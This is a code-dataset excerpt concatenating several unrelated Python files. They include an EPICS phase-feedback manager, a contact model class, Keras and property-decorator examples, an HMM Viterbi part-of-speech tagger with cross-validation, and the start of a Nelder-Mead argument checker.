numpy.mean([self.config.pvs[\"pcav1PV\"].get(),self.config.pvs[\"pcav2PV\"].get()])\n self.config.pvs[\"fehFBOffset\"].put(value=self.phoffset[\"hxr\"]) \n elif beamline==\"sxr\":\n self.phoffset[\"sxr\"]= self.phoffset[\"sxr\"] + numpy.mean([self.config.pvs[\"pcav3PV\"].get(),self.config.pvs[\"pcav4PV\"].get()])\n self.config.pvs[\"nehFBOffset\"].put(value=self.phoffset[\"sxr\"]) \n return 0\n # update dc offset to phase shifter delta correction term\n # save these offsets to local values\n\n async def loadPcavOffsets(self):\n \"\"\" Load pcav offsets from previous values, if needed.\"\"\"\n pass\n\n async def loadCabStabGains(self):\n \"\"\" Update the feedback gains from the PVs. \"\"\"\n self.hxrgain = self.config.pvs[\"fehFBGain\"].get()\n self.sxrgain = self.config.pvs[\"nehFBGain\"].get()\n self.hxrfeedbackenabled = self.config.pvs[\"fehFBEnable\"].get()\n self.sxrfeedbackenabled = self.config.pvs[\"nehFBEnable\"].get()\n\n async def updateStartingCabStabPhases(self):\n \"\"\" Copy the current phase shifter position to offsets. \"\"\"\n self.config.pvs[\"fehFBOffset\"].put(self.config.pvs[\"fehphaseshifterPV\"].get())\n self.config.pvs[\"nehFBOffset\"].put(self.config.pvs[\"nehphaseshifterPV\"].get())\n return 0\n\n async def updateState(self):\n \"\"\" Function to monitor and respond to differences in state. \"\"\"\n # if self.config.pvs[\"fehFBEnable\"].get().value() != 0:\n # self.hxrfeedbackenabled = True\n # else\n # self.hxrfeedbackenabled = False\n # if self.config.pvs[\"nehFBEnable\"].get().value() != 0:\n # self.sxrfeedbackenabled = True\n # else\n # self.sxrfeedbackenabled = False\n if self.config.pvs[\"fehFBRequestZero\"].get() != 0:\n await self.zeroPcavOffsetForBeamline(\"hxr\")\n self.config.pvs[\"fehFBRequestZero\"].put(value=0)\n if self.config.pvs[\"nehFBRequestZero\"].get() != 0:\n await self.zeroPcavOffsetForBeamline(\"sxr\")\n self.config.pvs[\"nehFBRequestZero\"].put(value=0)\n self.phoffset[\"hxr\"] = self.config.pvs[\"fehFBOffset\"].get()\n self.phoffset[\"sxr\"] = self.config.pvs[\"nehFBOffset\"].get()\n self.hxrgain = self.config.pvs[\"fehFBGain\"].get()\n self.sxrgain = self.config.pvs[\"nehFBGain\"].get()\n self.hxrfeedbackenabled = self.config.pvs[\"fehFBEnable\"].get()\n self.sxrfeedbackenabled = self.config.pvs[\"nehFBEnable\"].get()\n\n\nclass config(object):\n def __init__(self,debug=False,sim=False):\n self.pvstrlist = [\"pcav1PV\",\"pcav2PV\",\"pcav3PV\",\"pcav4PV\",\"fehphaseshifterPV\",\"nehphaseshifterPV\",\"fiberoventempPV\",\"watchdog\",\"fehFBEnable\",\"nehFBEnable\",\"fehFBOffset\",\"nehFBOffset\",\"fehFBGain\",\"nehFBGain\",\"restorePrevious\",\"fehFBRequestZero\",\"nehFBRequestZero\"]\n self.configIsValid = False\n self.pvs = {}\n self.debug = debug\n self.sim = sim\n \n def loadConfig(self):\n if self.sim:\n with open(\"proto_fsmanager_config.json\",'r') as fp:\n self.inputjson = json.load(fp)\n else:\n with open(\"fsmanager_config.json\",'r') as fp:\n self.inputjson = json.load(fp)\n for pvstr in self.pvstrlist:\n if pvstr not in self.inputjson[\"pvs\"].keys():\n print(\"configuration file poorly formatted: %s\" % pvstr)\n return\n else:\n self.pvs[pvstr] = epics.PV(self.inputjson[\"pvs\"][pvstr])\n temp = self.pvs[pvstr].get()\n if temp is None:\n print(\"could not access pv: %s\" % pvstr)\n return\n self.configIsValid = True\n if self.debug:\n print('loadConfig: completed')\n\nasync def main():\n fsmgr = fs_manager(debug=args.debug,sim=args.simulation)\n watchdogCounter = watchdog3.watchdog(fsmgr.config.pvs[\"watchdog\"])\n if watchdogCounter.error:\n return 1\n await fsmgr.zeroPcavOffsets()\n await fsmgr.updateStartingCabStabPhases()\n while watchdogCounter.error == 0:\n await fsmgr.updateState()\n await fsmgr.updatePcavValues()\n watchdogCounter.check()\n await fsmgr.fssleep()\n # pdb.set_trace()\n # print(fsmgr.pcavdata[0][0],fsmgr.pcavdata[2][0])\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description = 'Manager for to tie pcav measurements to cable stabilizer and fiber oven.')\n parser.add_argument(\"-D\", \"--debug\", action=\"store_true\",help=\"Print output state, but do not execute\")\n parser.add_argument(\"-S\", \"--simulation\", action=\"store_true\",help=\"Run the manager code with simulated PVs\")\n args = parser.parse_args()\n # asyncio.run(main()) # changing to python3.6\n asyncio.get_event_loop().run_until_complete(main())","sub_path":"fsManager.py","file_name":"fsManager.py","file_ext":"py","file_size_in_byte":10631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"600087870","text":"\nfrom sys import maxsize\n\nclass Contact:\n\n def __init__(self, first_name=None, last_name=None, id=None, address=None,\n home_phone=None, mobile_phone=None, work_phone=None, secondary_phone=None,\n email=None, email2=None, email3=None, all_phones_from_homepage=None, all_mails_from_homepage=None):\n self.first_name = first_name\n self.last_name = last_name\n self.address = address\n self.home_phone = home_phone\n self.mobile_phone = mobile_phone\n self.work_phone = work_phone\n self.secondary_phone = secondary_phone\n self.email = email\n self.email2 = email2\n self.email3 = email3\n self.id = id\n self.all_phones_from_homepage = all_phones_from_homepage\n self.all_mails_from_homepage = all_mails_from_homepage\n\n\n def __repr__(self):\n return \"%s:%s:%s:%s:%s:%s:%s:%s:%s:%s:%s\" % (self.id, self.last_name, self.first_name,\n self.address, self.home_phone, self.mobile_phone, self.work_phone,\n self.secondary_phone, self.email, self.email2, self.email3)\n\n def __eq__(self, other):\n return self.id == None or other.id == None or self.id == other.id \\\n and self.last_name == other.last_name \\\n and self.first_name == other.first_name\n\n def id_or_max(self):\n if self.id:\n return int(self.id)\n else:\n return maxsize","sub_path":"model/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"14991934","text":"# dim이 1인 아웃풋 모델 3개를 작성\n# t08로 만들것\n\n\nfrom numpy import array\nfrom numpy import hstack\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense,Input\nfrom keras.layers.merge import concatenate\n\ndef split_sequence(sequence, n_steps):\n X, y = list(), list()\n for i in range(len(sequence)):\n # find the end of this pattern\n end_ix = i + n_steps\n # check if we are beyond the sequence\n if end_ix > len(sequence)-1:\n break\n # gather input and output parts of the pattern\n seq_x, seq_y = sequence[i:end_ix, :], sequence[i+1:end_ix+1, :]\n X.append(seq_x)\n y.append(seq_y)\n return array(X), array(y)\n\n# define input sequence\nin_seq1 = array([10, 20, 30, 40, 50, 60, 70, 80, 90])\nin_seq2 = array([15, 25, 35, 45, 55, 65, 75, 85, 95])\nout_seq = array([in_seq1[i]+in_seq2[i] for i in range(len(in_seq1))])\n\n# convert to [rows, columns]\nin_seq1 = in_seq1.reshape((len(in_seq1), 1))\nin_seq2 = in_seq2.reshape((len(in_seq2), 1))\nout_seq = out_seq.reshape((len(out_seq), 1))\n\n# horizontally stack columns\ndataset = hstack((in_seq1, in_seq2, out_seq))\nprint(dataset)\nn_steps = 3\nX, y = split_sequence(dataset, n_steps=n_steps)\nprint(X.shape, y.shape)\n\nfor i in range(len(X)):\n print(X[i], y[i])\n\n# flatten\nn_input = X.shape[1] * X.shape[2]\nX = X.reshape((X.shape[0], n_input))\nn_output = y.shape[1] * y.shape[2]\ny = y.reshape((y.shape[0], n_output))\n\n# model\nmodel = Sequential()\nmodel.add(Dense(100, activation='relu', input_dim=n_input))\nmodel.add(Dense(n_output))\nmodel.compile(optimizer='adam', loss='mse')\n\nmodel.fit(X, y, epochs=2000, verbose=0)\n\nx_input = array([[70, 75, 145], [80, 85, 165], [90, 95, 185]])\nx_input = x_input.reshape((1, n_input))\nyhat = model.predict(x_input, verbose=0)\nyhat = yhat.reshape((3,3))\nprint(yhat)\n\"\"\"\n#\nX1 = X[:, :, 0]\nX2 = X[:, :, 1]\nX3 = X[:, :, 2]\n\n# first input model\nvisible1 = Input(shape=(n_steps,))\ndense1 = Dense(100, activation='relu')(visible1)\n# second input model\nvisible2 = Input(shape=(n_steps,))\ndense2 = Dense(1000, activation='relu')(visible2)\n# third input model\nvisible3 = Input(shape=(n_steps,))\ndense3 = Dense(1000, activation='relu')(visible3)\n\n# merge input models\nmerge = concatenate([dense1, dense2, dense3])\noutput = Dense(3)(merge)\nmodel = Model(inputs=[visible1, visible2, visible3], outputs=output)\nmodel.compile(optimizer='adam', loss='mse')\n# fit model\nmodel.fit([X1, X2, X3], y, epochs=2000, verbose=0)\n\n# demonstrate prediction\nx_input = array([[70, 75, 145], [80, 85, 165], [90, 95, 185]])\nx1 = x_input[:, 0].reshape((1, n_steps))\nx2 = x_input[:, 1].reshape((1, n_steps))\nx3 = x_input[:, 2].reshape((1, n_steps))\nyhat = model.predict([x1, x2, x3], verbose=0)\n\nprint(yhat)\n\"\"\"","sub_path":"time/t10_test.py","file_name":"t10_test.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"154186671","text":"class Employee:\n def __init__(self, name, company, retired='NO'):\n self.__name = name\n self.__company = company\n self.__retired = retired\n\n @property\n def company(self):\n print(\"@property class method called: \")\n return self.__company\n\n @company.setter\n def company(self, value):\n print(\"@company.setter class method called: \")\n self.__company = value\n\n\ne = Employee(\"Prafull\", \"Amazon\")\nprint(\"Company name is : \", e.company)\nprint(\"=\" * 35)\ne.company = \"Google\"\nprint(\"Company name is : \", e.company)\nprint(\"=\" * 35)\nEmployee.company = \"Microsoft\"\nprint(\"Company name is : \", Employee.company)\n\n\n\n\n\n","sub_path":"property_deco.py","file_name":"property_deco.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"390569484","text":"import adv.adv_test\nfrom core.advbase import *\n\ndef module():\n return Fritz\n\nclass Fritz(Adv):\n conf = {}\n conf['acl'] = \"\"\"\n `s1, seq=5 and cancel or fsc\n `s2\n `s3, seq=5 and cancel or fsc\n `fs, seq=5\n \"\"\"\n\n def prerun(this):\n this.stance = 0\n this.s2fscharge = 0\n\n def s2_proc(this, e):\n this.s2fscharge = 3\n\n def fs_proc(this, e):\n if this.s2fscharge > 0:\n this.s2fscharge -= 1\n this.dmg_make(\"o_fs_boost\",0.57*3+0.29)\n\n\n\nif __name__ == '__main__':\n conf = {}\n adv.adv_test.test(module(), conf, verbose=0)\n","sub_path":"adv/fritz.py","file_name":"fritz.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"118172756","text":"# -*- coding: utf-8 -*-\n# Importing necessary libraries\n\nimport numpy as np\nimport itertools\nimport matplotlib\nimport nltk\nimport random\nimport math\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\nimport matplotlib.pyplot as plt\nimport statistics\nimport pandas as pd\n\n# display_conf_matrix() takes the confusion matrix and produces a visual of it\ndef display_conf_matrix(conf, labels):\n # Set font values for the confusion matrix image\n font = {'family' : 'DejaVu Sans',\n 'weight' : 'bold',\n 'size' : 10}\n plt.rc('font', **font)\n cm_obj=ConfusionMatrixDisplay(conf, display_labels=labels)\n fig, ax = plt.subplots(figsize=(30,30))\n ax.set_xticklabels(labels,fontsize=9)\n ax.set_yticklabels(labels,fontsize=9)\n # values_format='' is used to avoid showing in precision format eg 4200 shoudn't be shown as 4.2e3 (just to make the confusion matrix look better) \n cm_obj.plot(ax=ax,values_format='')\n # set the axis labels and title\n cm_obj.ax_.set(\n title=\"Confusion Matrix\",\n xlabel=\"Predicted\",\n ylabel=\"Actual\"\n )\n ax.xaxis.label.set_size(30)\n ax.yaxis.label.set_size(30)\n ax.title.set_size(30)\n\n\n# per_POS_evaluation() calculates the per POS performance\n# For each pair for tags(one from row and other column) in confusion matrix\n# calculate the precision, recall and F1 Score\n# All these scores are stored in a dataframe and the dataframe is returned\ndef per_POS_evaluation(conf_matrix,uniq_tag):\n li=[]\n for i in range(len(conf_matrix)):\n rt,ct=0,0\n # rt= no. of actual tags for tag i\n # rt= no. of predicted(obtained) tags for tag i\n for j in range(len(conf_matrix)):\n rt+=conf_matrix[i][j]\n ct+=conf_matrix[j][i]\n A=conf_matrix[i][i]\n # Calculate scores for each POS tag \n prec=A/ct\n rec=A/rt\n F1=(2*prec*rec)/(prec+rec)\n li.append([prec,rec,F1])\n di={}\n i=0\n for l in li:\n di[uniq_tag[i]]=l\n i+=1\n table=pd.DataFrame.from_dict(di, orient='index')\n table.columns=['Precision', 'Recall', 'F1_Score']\n return table\n\n# Getting the brown corpus\nprint(\"Downloading files from NLTK please wait...\")\nnltk.download('all', quiet=True)\nprint(\"NLTK files downloaded!\") \nfrom nltk.corpus import brown\n\n# Sentences fetched with its word tagged with universal tagset and sentences are\n# prefixed and suffixed by delimiters. If originally sentence contains a \n# delimiter then set it as ('','X')\nsentence_tag = nltk.corpus.brown.tagged_sents(tagset=\"universal\")\nmodified_sentence_tag=[]\nfor sent in sentence_tag:\n for word,tag in sent:\n if word=='^^' or word=='$$':\n word=''\n tag='X'\n sent.insert(0,('^^','^^')) # Sentence starts with '^^'\n sent.append(('$$','$$')) # Sentence ends with '$$'\n modified_sentence_tag.append(sent)\n\n# Shuffle the whole corpus uniformly\nrandom.shuffle(modified_sentence_tag)\n\n# Divide corpus into 5 equal parts\nsentences_set1=modified_sentence_tag[:math.floor(len(modified_sentence_tag)*1/5)]\nsentences_set2=modified_sentence_tag[math.floor(len(modified_sentence_tag)*1/5):math.floor(len(modified_sentence_tag)*2/5)]\nsentences_set3=modified_sentence_tag[math.floor(len(modified_sentence_tag)*2/5):math.floor(len(modified_sentence_tag)*3/5)]\nsentences_set4=modified_sentence_tag[math.floor(len(modified_sentence_tag)*3/5):math.floor(len(modified_sentence_tag)*4/5)]\nsentences_set5=modified_sentence_tag[math.floor(len(modified_sentence_tag)*4/5):]\n\ntrain_sentences=[[],[],[],[],[]]\ntest_sentences=[[],[],[],[],[]]\n\n# For 5 Fold Cross Validation Train and test set\n# Set1 as test set\ntrain_sentences[0]=sentences_set2+sentences_set3+sentences_set4+sentences_set5\ntest_sentences[0]=sentences_set1\n\n# Set2 as test set\ntrain_sentences[1]=sentences_set1+sentences_set3+sentences_set4+sentences_set5\ntest_sentences[1]=sentences_set2\n\n# Set3 as test set\ntrain_sentences[2]=sentences_set1+sentences_set2+sentences_set4+sentences_set5\ntest_sentences[2]=sentences_set3\n\n# Set4 as test set\ntrain_sentences[3]=sentences_set1+sentences_set2+sentences_set3+sentences_set5\ntest_sentences[3]=sentences_set4\n\n# Set5 as test set\ntrain_sentences[4]=sentences_set1+sentences_set2+sentences_set3+sentences_set4\ntest_sentences[4]=sentences_set5\n\nprecision_sets=[0]*5\nrecall_sets=[0]*5\nF1_score_sets=[0]*5\nF05_score_sets=[0]*5\nF2_score_sets=[0]*5\npos_estimation_sets=[pd.DataFrame]*5\nprint(\"Running Viterbi over all 5 cross validation sets...\") #Note this is just for showing progress, viterbi is executed further in the loop\nfor setno in range(5):\n # For each set calculate the transmission and emission probabilities on training set\n # And perform viterbi on test set. Later find per POS and overall estimation\n train_dataset = train_sentences[setno]\n test_dataset = test_sentences[setno]\n\n ## EMISSION PROBABILITY TABLE\n # Creation of a dictionary whose keys are tags and values contain words which have corresponding tag in the taining dataset\n # example:- 'TAG':{word1: count(word1,'TAG')} count(word1,'TAG') means how many times the word is tagged as 'TAG'\n train_word_tag = {}\n for sent in train_dataset:\n for (word,tag) in sent:\n word=word.lower() # removing ambiguity from capital letters \n try:\n try:\n train_word_tag[tag][word]+=1\n except:\n train_word_tag[tag][word]=1\n except:\n train_word_tag[tag]={word:1}\n\n #Calculation of emission probabilities using train_word_tag\n train_emission_prob={}\n for key in train_word_tag.keys():\n train_emission_prob[key]={}\n count = sum(train_word_tag[key].values()) # count is total number of words tagged as a 'TAG'\n for key2 in train_word_tag[key].keys():\n train_emission_prob[key][key2]=train_word_tag[key][key2]/count \n #Emission probability is #times a word occured as 'TAG' / total number of 'TAG' words\n #example: number of times 'Sandeep' occured as Noun / total number of nouns\n\n ## TRANSITION PROBABILITY TABLE\n #Estimating the bigrams of tags to be used for calculation of transition probability \n #Bigram Assumption is made, the current tag depends only on the previous tag\n bigram_tag_data = {}\n for sent in train_dataset:\n bi=list(nltk.bigrams(sent))\n for b1,b2 in bi:\n try:\n try:\n bigram_tag_data[b1[1]][b2[1]]+=1\n except:\n bigram_tag_data[b1[1]][b2[1]]=1\n except:\n bigram_tag_data[b1[1]]={b2[1]:1}\n\n #bigram_tag_data is storing the values for every tag.\n #Every key is a tag and value is tag followed for that key and corresponding counts.\n #example: how many times an adj is followed by a noun {Noun:{Adj:3}}, here its 3 times.\n\n #Calculation of the probabilities of tag bigrams for transition probability\n #We already made a bigram assumption \n #Also note that since we are also considering $, the $ row of transition probability matrix give us the initial probabilities as well\n bigram_tag_prob={}\n for key in bigram_tag_data.keys():\n bigram_tag_prob[key]={}\n count=sum(bigram_tag_data[key].values()) # count is total number of times a 'TAG' has occured\n for key2 in bigram_tag_data[key].keys():\n bigram_tag_prob[key][key2]=bigram_tag_data[key][key2]/count\n #Tranmission probability is #times a TAG2 is preceded by TAG1 / total number of times TAG1 exists in dataset\n #example: number of times a noun occured before adjective / total number of times a noun occurred\n\n #Calculation the possible tags for each word in the train dataset\n tags_of_tokens = {}\n count=0\n for sent in train_dataset:\n for (word,tag) in sent:\n word=word.lower()\n try:\n if tag not in tags_of_tokens[word]:\n tags_of_tokens[word].append(tag)\n except:\n list_of_tags = []\n list_of_tags.append(tag)\n tags_of_tokens[word] = list_of_tags\n #Each word and its corresponding tags in the train dataset\n\n # Getting words and their corresponding tags from the test set\n # Seperating the test data into test words and test tags\n test_words=[]\n test_tags=[]\n for sent in test_dataset:\n temp_word=[]\n temp_tag=[]\n for (word,tag) in sent:\n temp_word.append(word.lower()) # words of a sentence in test dataset\n temp_tag.append(tag) # tags of a sentence in test dataset\n test_words.append(temp_word) # list with words of a sentence(tokenized sentence) appended to a list of list\n test_tags.append(temp_tag) # list with tags of a sentence(tokenized sentence) appended to a list of list\n\n #VITERBI ALGORITHM IMPLEMENTATION\n# For each word in a sentence\n# – The probability of best candidates for each tag at previous level is\n# multiplied with the emission probability and the transition\n# probability of possible tags based on current word\n# – The best candidate for each tag at the current level is chosen and\n# the previous tag is kept a track of for backtracking\n# – The result of forward propagation at each level looks like the\n# following\n# LEVEL_K:{TAG1:{best_candidate_among_Tag1,probability_of the\n# best candidate} , {TAG2:{previous_tag_of_best_candidate_\n# among_Tag2, probability_of the best candidate}, ...}\n# – When backtracking start from the end to start choosing the\n# predicted tag based on LEVEL information and the predicted tag\n# that follows the word.\n# – In case an unseen word arrives the next tag is set to ‘NOUN’ and\n# the emission probability is set to a low probability (0.0001). This is\n# based on the observation from the corpus that ≈ 63% of the\n# unseen words were noun.\n predicted_tags = [] #Final list for prediction\n for i in range(len(test_words)): # for each tokenized sentence in the test data (test_words is a list of lists)\n sent = test_words[i]\n #storing_values is a dictionary which stores the required values\n #ex: storing_values = {step_no.:{state1:[previous_best_state,value_of_the_state]}} \n storing_values = {} \n for q in range(len(sent)):\n step = sent[q]\n #for the starting word of the sentence\n if q == 1: \n storing_values[q] = {}\n try:\n tags = tags_of_tokens[step]\n except:\n # print(step,test_tags_of_tokens[step])\n tags=['NOUN'] #tags_of_unseen_tokens\n for t in tags:\n #this is applied since we do not know whether the word in the test data is present in train data or not\n try:\n storing_values[q][t] = ['^^',bigram_tag_prob['^^'][t]*train_emission_prob[t][step]]\n #if word is not present in the train data but present in test data we assign a very low probability of 0.0001\n except:\n storing_values[q][t] = ['^^',0.0001]\n \n #if the word is not at the start of the sentence\n if q>1:\n storing_values[q] = {}\n previous_states = list(storing_values[q-1].keys()) # loading the previous states\n try:\n current_states = tags_of_tokens[step] # loading the current states\n except:\n current_states = ['NOUN']#tags_of_unseen_tokens\n #calculation of the best previous state for each current state and then storing\n #it in storing_values\n for t in current_states: \n temp = []\n for pt in previous_states: \n try:\n temp.append(storing_values[q-1][pt][1]*bigram_tag_prob[pt][t]*train_emission_prob[t][step]) # If seen word\n except:\n temp.append(storing_values[q-1][pt][1]*0.0001)\n max_temp_index = temp.index(max(temp))\n best_pt = previous_states[max_temp_index]\n storing_values[q][t]=[best_pt,max(temp)] #Store the best previous tag for each best candidate per tag and the meximum probability\n \n #Backtracing to extract the best possible tags for the sentence\n # for each word looking the current word and the word and tag next to it in the sentence backtrack\n # to get the tag of current word\n pred_tags = [] #predicted tags by viterbi using backtracking\n total_steps_num = storing_values.keys()\n last_step_num = max(total_steps_num) # Begin from the last word which will end the delimiter\n for bs in range(len(total_steps_num)): \n step_num = last_step_num - bs \n if step_num == last_step_num:\n pred_tags.append('$$')\n pred_tags.append(storing_values[step_num]['$$'][0]) \n if step_num0:\n pred_tags.append(storing_values[step_num][pred_tags[len(pred_tags)-1]][0]) #Looking into storing value fetch the best previous tag for the current word\n predicted_tags.append(list(reversed(pred_tags)))\n\n\n#Now that the tags are predicted, get the actual and predicted tags so that analysis can be done\n tag_seq_act=[]\n tag_seq_pred=[]\n uniq_tag=set()\n uniq_tag_dict={}\n for li in test_tags:\n for tag in li:\n if(tag!=\"^^\" and tag!=\"$$\"): #Exclude delimiters\n tag_seq_act.append(tag)\n\n for li in predicted_tags:\n for tag in li:\n if(tag!=\"^^\" and tag!=\"$$\"): #Exclude delimiters\n tag_seq_pred.append(tag)\n \n for tag in tag_seq_act:\n uniq_tag.add(tag)\n\n uniq_tag=list(uniq_tag)\n \n for i in range(len(uniq_tag)):\n uniq_tag_dict[uniq_tag[i]]=i\n \n for i,tag in enumerate(tag_seq_act):\n tag_seq_act[i]=uniq_tag_dict[tag]\n\n for i,tag in enumerate(tag_seq_pred):\n tag_seq_pred[i]=uniq_tag_dict[tag]\n\n# Calculate the precision, Recall and F-Scores by comparing the actual and predicted tags\n matched_tags=0\n for i in range(len(tag_seq_act)):\n if tag_seq_act[i]==tag_seq_pred[i]:\n matched_tags+=1\n # Estimations for the current set\n precision=matched_tags/(len(tag_seq_pred))\n recall=matched_tags/(len(tag_seq_act))\n F1_score=(2*precision*recall)/(precision+recall)\n F05_score=(1.25*precision*recall)/(0.25*precision+recall)\n F2_score=(5*precision*recall)/(4*precision+recall)\n # A confusion matrix is created which is used to diplay the confusion matrix and for per pos evaluation\n conf_matrix=confusion_matrix(tag_seq_act,tag_seq_pred)\n pos_estimation=per_POS_evaluation(conf_matrix, uniq_tag)\n\n #Store every set's estimations\n precision_sets[setno]=precision\n recall_sets[setno]=recall\n F1_score_sets[setno]=F1_score\n F05_score_sets[setno]=F05_score\n F2_score_sets[setno]=F2_score\n pos_estimation_sets[setno]=pos_estimation\n print(\"Set \",setno+1,\"✓\")\n\n# After getting every set's estimations combine them\n# For k fold cross validation\n# mean(each of the k set estimations) ± standard_error(each of the k set estimations)\n# standard_error= standard_deviation/square_root(k)\n# example Overall precision=(Σ precision_set i)/5 ± squareroot([Σ(precision_set_i-precision_mean)²]/5) here 5 for 5 fold cross validation\nprint(\"===================\\nOVERALL ESTIMATIONS\\n===================\")\nprint(\"Overall Precision:\", \"{:.6f}\".format(statistics.mean(precision_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(precision_sets)/math.sqrt(setno+1)))\nprint(\"Overall Recall:\" ,\"{:.6f}\".format(statistics.mean(recall_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(recall_sets)/math.sqrt(setno+1)))\nprint(\"Overall F1 Score:\", \"{:.6f}\".format(statistics.mean(F1_score_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(F1_score_sets)/math.sqrt(setno+1)))\nprint(\"Overall F0.5 Score:\", \"{:.6f}\".format(statistics.mean(F1_score_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(F1_score_sets)/math.sqrt(setno+1)))\nprint(\"Overall F2 Score:\", \"{:.6f}\".format(statistics.mean(F1_score_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(F1_score_sets)/math.sqrt(setno+1)))\nmean_POS_est=(pos_estimation_sets[0]+pos_estimation_sets[1]+pos_estimation_sets[2]+pos_estimation_sets[3]+pos_estimation_sets[4])/5\nse_POS_est=np.sqrt((pos_estimation_sets[0]-mean_POS_est)**2+(pos_estimation_sets[1]-mean_POS_est)**2+(pos_estimation_sets[2]-mean_POS_est)**2+(pos_estimation_sets[3]-mean_POS_est)**2+(pos_estimation_sets[4]-mean_POS_est)**2)/5\nprint(\"\\n===============\\nPOS ESTIMATIONS\\n===============\\n++++\\nMEAN\\n++++\\n\",mean_POS_est,\"\\n++++++++++++++\\nSTANDARD ERROR\\n++++++++++++++\\n\",se_POS_est)\n\nprint(\"\\n\\nThe confusion matrix of set \",setno+1,\" will be displayed\")\n#Here confusion matrix for the set 5 is shown\ndisplay_conf_matrix(conf_matrix, uniq_tag)\n#Following line is used to show the confusion matrix when the code is run on terminal, can be commented if using jupyter notebooks \nmatplotlib.pyplot.show()\n","sub_path":"Assignment1 Submission/HMM/hmm_viterbi.py","file_name":"hmm_viterbi.py","file_ext":"py","file_size_in_byte":16630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"67192178","text":"# Copyright 2020 Yalfoosh\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nfrom typing import Optional, Tuple, Union\n\nimport numpy as np\n\nfrom . import constants\nfrom .function import Function\n\n\ndef clean_nelder_mead_simplex_search_arguments(\n function: Function,\n alpha: float,\n beta: float,\n gamma: float,\n sigma: float,\n use_jakobovic_expand: bool,\n epsilon: float,\n max_iterations: int,\n verbosity: Optional[str],\n decimal_precision: int,\n) -> Tuple[Function, float, float, float, float, bool, float, int, int, int]:\n \"\"\"\n Checks the Nelder Mead Simplex Search arguments and returns them prepared for work.\n\n Args:\n function (Function): A Function representing the loss function.\n alpha (float): A float used in point reflection.\n beta (float): A float used in point contraction.\n gamma (float): A float used in point expansion.\n sigma (float): A float used when moving points to the optimum.\n use_jakobovic_expand (bool): A bool determining whether or not to use the\n __expand_jakobovic method instead of the __expand method for point expansion.\n Defaults to False.\n epsilon (float): A float representing the error threshold.\n max_iterations (int): An int representing the maximum number of iterations\n before the algorithm times out and returns the last found optimum.\n verbosity (Optional[str]): A str representing the verbosity of the output during\n algorithm execution.\n decimal_precision (int): An int representing the number of decimal digits to\n round numbers outputted during algorithm execution.\n\n Raises:\n TypeError: Raised if argument function is not a Function.\n TypeError: Raised if argument alpha is not a float.\n TypeError: Raised if argument beta is not a float.\n TypeError: Raised if argument gamma is not a float.\n TypeError: Raised if argument sigma is not a float.\n TypeError: Raised if argument use_jakobovic_expand is not a bool.\n TypeError: Raised if argument epsilon is not a float.\n ValueError: Raised if argument epsilon is a negative number.\n TypeError: Raised if argument max_iterations is not an int.\n ValueError: Raised if argument max_iterations is a negative number.\n TypeError: Raised if argument verbosity is not a str.\n KeyError: Raised if argument verbosity is an invalid key.\n TypeError: Raised if argument decimal_precision is not an int.\n ValueError: Raised if argument decimal_precision is a negative number.\n\n Returns:\n Tuple[Function, float, float, float, float, bool, float, int, int, int]: Cleaned\n arguments.\n \"\"\"\n if not isinstance(function, Function):\n raise TypeError(\n \"Expected argument function to be a Function, instead it is \"\n f\"{type(function)}.\"\n )\n\n if isinstance(alpha, int):\n alpha = float(alpha)\n\n if not isinstance(alpha, float):\n raise TypeError(\n \"Expected argument alpha to be a float, instead it is \" f\"{type(alpha)}.\"\n )\n\n if isinstance(beta, int):\n beta = float(beta)\n\n if not isinstance(beta, float):\n raise TypeError(\n \"Expected argument beta to be a float, instead it is \" f\"{type(beta)}.\"\n )\n\n if isinstance(gamma, int):\n gamma = float(gamma)\n\n if not isinstance(gamma, float):\n raise TypeError(\n \"Expected argument gamma to be a float, instead it is \" f\"{type(gamma)}.\"\n )\n\n if isinstance(sigma, int):\n sigma = float(sigma)\n\n if not isinstance(sigma, float):\n raise TypeError(\n \"Expected argument sigma to be a float, instead it is \" f\"{type(sigma)}.\"\n )\n\n if not isinstance(use_jakobovic_expand, bool):\n raise TypeError(\n \"Expected argument use_jakobovic_expand to be a bool, instead it is \"\n f\"{type(use_jakobovic_expand)}.\"\n )\n\n if not isinstance(epsilon, float):\n raise TypeError(\n \"Expected argument epsilon to be a float, instead it is \"\n f\"{type(epsilon)}.\"\n )\n\n if epsilon < 0:\n raise ValueError(\n \"Expected argument epsilon to be a positive float, instead it is \"\n f\"{epsilon}.\"\n )\n\n if not isinstance(max_iterations, int):\n raise TypeError(\n \"Expected argument max_interations to be an int, instead it is \"\n f\"{type(max_iterations)}.\"\n )\n\n if max_iterations < 1:\n raise ValueError(\n \"Expected argument max_interations to be a positive integer, instead it is \"\n f\"{max_iterations}.\"\n )\n\n if verbosity is None:\n verbosity = \"none\"\n\n if not isinstance(verbosity, str):\n raise TypeError(\n f\"Expected argument verbosity to be a str, instead it is {type(verbosity)}.\"\n )\n\n if verbosity not in constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT:\n verbosity_dict_length = 